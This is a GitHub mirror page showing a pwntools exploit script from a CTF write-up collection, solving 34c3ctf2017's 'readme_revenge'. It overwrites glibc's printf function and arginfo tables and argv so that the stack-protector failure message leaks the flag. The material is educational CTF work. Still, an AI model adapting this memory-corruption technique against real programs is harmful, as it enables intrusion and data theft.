nganhkhoa/CTF-All-In-One
1
0
Fork 0
mirror of https://github.com/nganhkhoa/CTF-All-In-One.git synced 2024-12-25 11:41:16 +07:00
Code Issues Projects Releases Wiki Activity
f1c51d8ea3
CTF-All-In-One/src/writeup/6.1.13_pwn_34c3ctf2017_readme_revenge/exp.py
firmianay 2e3e6f11c5 update 4.14_glibc_tcache
2018-04-15 15:50:03 +08:00

29 lines
796 B
Python
Raw Blame History

#!/usr/bin/env python
from pwn import *
io = process('./readme_revenge')
flag_addr = 0x6b4040
name_addr = 0x6b73e0
argv_addr = 0x6b7980
func_table = 0x6b7a28
arginfo_table = 0x6b7aa8
stack_chk_fail = 0x4359b0
payload = p64(flag_addr) # name
payload = payload.ljust(0x73 * 8, "\x00")
payload += p64(stack_chk_fail) # __printf_arginfo_table[spec->info.spec]
payload = payload.ljust(argv_addr - name_addr, "\x00")
payload += p64(name_addr) # argv
payload = payload.ljust(func_table - name_addr, "\x00")
payload += p64(name_addr) # __printf_function_table
payload = payload.ljust(arginfo_table - name_addr, "\x00")
payload += p64(name_addr) # __printf_arginfo_table
# with open("./payload", "wb") as f:
# f.write(payload)
io.sendline(payload)
io.interactive()
Reference in New Issue View Git Blame Copy Permalink